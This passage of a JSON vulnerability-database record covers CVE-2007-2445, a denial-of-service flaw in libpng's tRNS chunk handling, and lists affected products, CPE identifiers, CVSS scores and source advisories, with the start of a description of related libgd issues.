"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "10 (x86)"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "8 (sparc)"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "8 (x86)"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "9 (sparc)"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "9 (x86)"
},
{
"_id": null,
"model": "turbolinux",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10_f"
},
{
"_id": null,
"model": "turbolinux appliance server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "1.0 (hosting)"
},
{
"_id": null,
"model": "turbolinux appliance server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "1.0 (workgroup)"
},
{
"_id": null,
"model": "turbolinux appliance server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "2.0"
},
{
"_id": null,
"model": "turbolinux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10"
},
{
"_id": null,
"model": "turbolinux fuji",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "turbolinux multimedia",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "turbolinux personal",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10"
},
{
"_id": null,
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10 (x64)"
},
{
"_id": null,
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "8"
},
{
"_id": null,
"model": "wizpy",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "home",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "imagekit",
"scope": "eq",
"trust": 0.8,
"vendor": "newton",
"version": "5"
},
{
"_id": null,
"model": "imagekit",
"scope": "eq",
"trust": 0.8,
"vendor": "newton",
"version": "6"
},
{
"_id": null,
"model": "imagekit",
"scope": "lte",
"trust": 0.8,
"vendor": "newton",
"version": "6 ( english edition ) fixno.43"
},
{
"_id": null,
"model": "imagekit",
"scope": "lte",
"trust": 0.8,
"vendor": "newton",
"version": "6 lite ( english edition ) fixno.30"
},
{
"_id": null,
"model": "imagekit",
"scope": "eq",
"trust": 0.8,
"vendor": "newton",
"version": "6 vcl"
},
{
"_id": null,
"model": "imagekit",
"scope": "eq",
"trust": 0.8,
"vendor": "newton",
"version": "7 activex"
},
{
"_id": null,
"model": "imagekit",
"scope": "lte",
"trust": 0.8,
"vendor": "newton",
"version": "7 activex ( english edition ) fixno.1"
},
{
"_id": null,
"model": "postkit",
"scope": "eq",
"trust": 0.8,
"vendor": "newton",
"version": "2"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (server)"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5.0 (client)"
},
{
"_id": null,
"model": "linux advanced workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1"
},
{
"_id": null,
"model": "rhel desktop workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (client)"
},
{
"_id": null,
"model": "express5800/fw",
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.17"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.25"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.18"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.7"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.13"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.14"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.12"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.9"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.6,
"vendor": "libpng",
"version": "1.2.17"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.11"
},
{
"_id": null,
"model": "linux",
"scope": null,
"trust": 0.6,
"vendor": "gentoo",
"version": null
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "0.90"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.15"
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.6,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "linux armel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2007.0"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.12"
},
{
"_id": null,
"model": "enterprise linux cluster-storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "linux hppa",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "multi network firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "2.0"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "enterprise linux supplementary server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "enterprise linux desktop multi os client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0x86"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.11"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "rpath",
"version": "1"
},
{
"_id": null,
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "android software development kit m3-rc37a",
"scope": null,
"trust": 0.3,
"vendor": "google",
"version": null
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "personal",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.1"
},
{
"_id": null,
"model": "appliance server hosting edition",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "1.0"
},
{
"_id": null,
"model": "enterprise linux desktop version",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "7.04"
},
{
"_id": null,
"model": "ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.1"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2007.1"
},
{
"_id": null,
"model": "advanced workstation for the itanium processor",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "fuji",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "7.04"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.10"
},
{
"_id": null,
"model": "enterprise linux ws ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "linux foresight linux",
"scope": "eq",
"trust": 0.3,
"vendor": "foresight",
"version": "1.1"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "android software development kit m5-rc15",
"scope": "ne",
"trust": 0.3,
"vendor": "google",
"version": null
},
{
"_id": null,
"model": "messaging storage server mm3.0",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "messaging storage server",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "engine irrlicht engine",
"scope": "ne",
"trust": 0.3,
"vendor": "irrlicht",
"version": "1.3.1"
},
{
"_id": null,
"model": "solaris 8 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "terminal server project linux terminal server project",
"scope": "eq",
"trust": 0.3,
"vendor": "linux",
"version": "4.2"
},
{
"_id": null,
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "appliance server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "2.0"
},
{
"_id": null,
"model": "ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "9"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2007.1"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "linux alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "e1.0-solid",
"scope": null,
"trust": 0.3,
"vendor": "openpkg",
"version": null
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "linux mipsel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "home",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "fuji",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "0"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2007.0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "terminal server project linux terminal server project",
"scope": "ne",
"trust": 0.3,
"vendor": "linux",
"version": "5.0"
},
{
"_id": null,
"model": "engine irrlicht engine",
"scope": "eq",
"trust": 0.3,
"vendor": "irrlicht",
"version": "1.1"
},
{
"_id": null,
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "3.0"
},
{
"_id": null,
"model": "message networking",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "enterprise linux optional productivity application server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux virtualization server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "appliance server workgroup edition",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "1.0"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "messaging storage server mss",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.7"
},
{
"_id": null,
"model": "advanced workstation for the itanium processor ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "solaris 8 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "fedora core5",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux desktop supplementary client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "ses",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0"
},
{
"_id": null,
"model": "linux alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "f...",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10"
},
{
"_id": null,
"model": "enterprise linux as ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "ses",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.1"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "10"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.8"
},
{
"_id": null,
"model": "message networking mn",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.0"
},
{
"_id": null,
"model": "enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "fedora core6",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.3"
},
{
"_id": null,
"model": "broker ftp server",
"scope": "eq",
"trust": 0.3,
"vendor": "transsoft",
"version": "8.0"
},
{
"_id": null,
"model": "linux m68k",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "propack sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "3.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.5"
},
{
"_id": null,
"model": "engine irrlicht engine",
"scope": "eq",
"trust": 0.3,
"vendor": "irrlicht",
"version": "1.2"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "linux armel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux hardware certification",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "solaris 10 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.0"
},
{
"_id": null,
"model": "current",
"scope": null,
"trust": 0.3,
"vendor": "openpkg",
"version": null
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "linux hppa",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "ses",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "solaris 9 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "3.0"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux mipsel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "7.04"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "engine irrlicht engine",
"scope": "eq",
"trust": 0.3,
"vendor": "irrlicht",
"version": "1.3"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0.0x64"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0.1"
},
{
"_id": null,
"model": "enterprise linux es ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "enterprise linux clustering server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "linux m68k",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "multimedia",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "7.04"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.24"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#684664"
},
{
"db": "BID",
"id": "24000"
},
{
"db": "BID",
"id": "24023"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000397"
},
{
"db": "NVD",
"id": "CVE-2007-2445"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:libpng:libpng",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:sun:java_desktop_system",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:sun:solaris",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_appliance_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_fuji",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_multimedia",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_personal",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_wizpy",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:turbolinux:turbolinux_home",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:newtone:imagekit",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:newtone:postkit",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:rhel_desktop_workstation",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:express5800_fw",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-000397"
}
]
},
"credits": {
"_id": null,
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "24000"
},
{
"db": "BID",
"id": "24023"
}
],
"trust": 0.6
},
"cve": "CVE-2007-2445",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2007-2445",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-2445",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#684664",
"trust": 0.8,
"value": "3.86"
},
{
"author": "NVD",
"id": "CVE-2007-2445",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200705-347",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#684664"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000397"
},
{
"db": "NVD",
"id": "CVE-2007-2445"
}
]
},
"description": {
"_id": null,
"data": "The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. libpng There is a service disruption (DoS) Vulnerabilities exist PNG (Portable Network Graphics) Format image processing library libpng of png_handle_tRNS() Functions include CRC Incorrect processing after check PNG Denial of service when processing files (DoS) There is a vulnerability that becomes a condition.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) It may be in a state. \nSuccessful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library. \nThis issue affects libpng-0.90 through libpng-1.2.16. \nThis BID is being retired because this issue was addressed in BID 24000 (Libpng Library Remote Denial of Service Vulnerability). \n\nCVE-2007-3476\n\n An array indexing error in libgd\u0027s GIF handling could induce a\n denial of service (crash with heap corruption) if exceptionally\n large color index values are supplied in a maliciously crafted\n GIF image file. \n\nCVE-2007-3477\n\n The imagearc() and imagefilledarc() routines in libgd allow\n an attacker in control of the parameters used to specify\n the degrees of arc for those drawing functions to perform\n a denial of service attack (excessive 